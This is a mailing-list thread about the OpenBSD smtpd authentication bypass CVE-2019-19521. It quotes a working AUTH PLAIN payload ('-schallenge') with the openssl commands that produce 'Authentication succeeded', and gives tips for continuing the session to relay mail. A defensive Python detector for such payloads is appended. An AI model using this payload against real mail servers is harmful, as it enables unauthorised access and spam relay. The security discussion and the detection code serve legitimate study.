Re: Exploit CVE-2019-19521?
Henry Jensen (2019-12-04 23:08 +0100):
> $ openssl s_client -connect 192.168.56.121:25 -starttls smtp
> ...
> I did verify, that this attack worked on my unpatched OpenBSD 6.6 Box.
> But I didn't get much further. After the authentication succeeded
> I continued with MAIL FROM: and RCPT TO: After the RCPT TO: the
> connection was aborted.

That is openssl s_client getting in your way. From the man page:

    When used interactively (which means neither -quiet nor -ign_eof have
    been given), the session will be renegotiated if the line begins with
    an R; if the line begins with a Q or if end of file is reached, the
    connection will be closed down.

The workaround is to use lowercase commands.
Re: Exploit CVE-2019-19521?
On Wed, Dec 04, 2019 at 11:08:44PM +0100, Henry Jensen wrote:
> Hi,
>
> from https://seclists.org/oss-sec/2019/q4/120
>
> ==
> 1.2. Case study: smtpd
> ==
>
> To demonstrate how smtpd's authentication can be bypassed, we follow the
> instructions from the manual page of smtpd.conf:
>
> [...]
>
> I did verify, that this attack worked on my unpatched OpenBSD 6.6 Box.
> But I didn't get much further. After the authentication succeeded
> I continued with MAIL FROM: and RCPT TO: After the RCPT TO: the
> connection was aborted. After I patched my system I could no longer get
> a 235 2.0.0 Authentication succeeded message
>
> Question is: would it have been possible in the "real world" to exploit
> this to relay arbitrary messages (e.g. spam)?
>

Yes it would have been most definitely possible, now if you have yourself
relayed spam, I'll tell you that it's very unlikely this was used.

--
Gilles Chehade @poolpOrg
https://www.poolp.org
patreon: https://www.patreon.com/gilles
Exploit CVE-2019-19521?
Hi,

from https://seclists.org/oss-sec/2019/q4/120

==
1.2. Case study: smtpd
==

To demonstrate how smtpd's authentication can be bypassed, we follow the
instructions from the manual page of smtpd.conf:

--
In this second example, the aim is to permit mail delivery and relaying
only for users that can authenticate (using their normal login
credentials).
...
listen on egress tls pki mail.example.com auth
...
match auth from any for any action "outbound"
--

and we restart smtpd. Then, with our remote-attacker hat on:

--
$ printf '\0-schallenge\0whatever' | openssl base64
AC1zY2hhbGxlbmdlAHdoYXRldmVy

$ openssl s_client -connect 192.168.56.121:25 -starttls smtp
...
EHLO client.example.com
...
AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy
235 2.0.0 Authentication succeeded
--

I did verify, that this attack worked on my unpatched OpenBSD 6.6 Box.
But I didn't get much further. After the authentication succeeded
I continued with MAIL FROM: and RCPT TO: After the RCPT TO: the
connection was aborted. After I patched my system I could no longer get
a 235 2.0.0 Authentication succeeded message

Question is: would it have been possible in the "real world" to exploit
this to relay arbitrary messages (e.g. spam)?

Regards,
Henry
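An added example, not part of this thread and not OpenSMTPD code: a small Python checker that decodes the SASL PLAIN argument of an AUTH PLAIN command (RFC 4616 layout, authzid NUL authcid NUL password) and flags an option-style user name such as the -schallenge value quoted above, so a defender can scan captured SMTP sessions or mail logs for bypass attempts. The sample lines and the function names are constructed for this example.

```python
import base64
import binascii

# Constructed samples: the AUTH PLAIN argument quoted in this thread
# (decodes to "\0-schallenge\0whatever") and a benign login for contrast.
SAMPLE_AUTH_LINES = [
    "AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy",
    "AUTH PLAIN " + base64.b64encode(b"\0alice\0s3cret").decode(),
]

def parse_sasl_plain(arg):
    """Decode a SASL PLAIN initial response: [authzid] NUL authcid NUL passwd.
    Returns (authzid, authcid, password), or None if the blob is malformed."""
    try:
        raw = base64.b64decode(arg, validate=True)
    except (ValueError, binascii.Error):
        return None
    parts = raw.split(b"\0")
    if len(parts) != 3:
        return None
    return tuple(p.decode("utf-8", "replace") for p in parts)

def looks_like_bsd_auth_option(name):
    """CVE-2019-19521 hinges on a user name that begins with '-': the BSD
    authentication layer hands it to the login_* helper, which reads it as a
    command-line option (the thread's payload uses -schallenge) rather than
    as a user name. No legitimate login name starts with '-'."""
    return name.startswith("-")

def flag_auth_plain(line):
    """Return a short verdict for one SMTP command line."""
    fields = line.split()
    if (len(fields) != 3 or fields[0].upper() != "AUTH"
            or fields[1].upper() != "PLAIN"):
        return "not-auth-plain"
    creds = parse_sasl_plain(fields[2])
    if creds is None:
        return "malformed"
    authzid, authcid, _ = creds
    if looks_like_bsd_auth_option(authcid) or looks_like_bsd_auth_option(authzid):
        return "suspicious: option-style user %r" % authcid
    return "ok: user %r" % authcid

if __name__ == "__main__":
    for cmd in SAMPLE_AUTH_LINES:
        print(cmd, "->", flag_auth_plain(cmd))
```

The same check applies to the AUTH LOGIN dialogue once its base64 user-name line is decoded; only the framing differs.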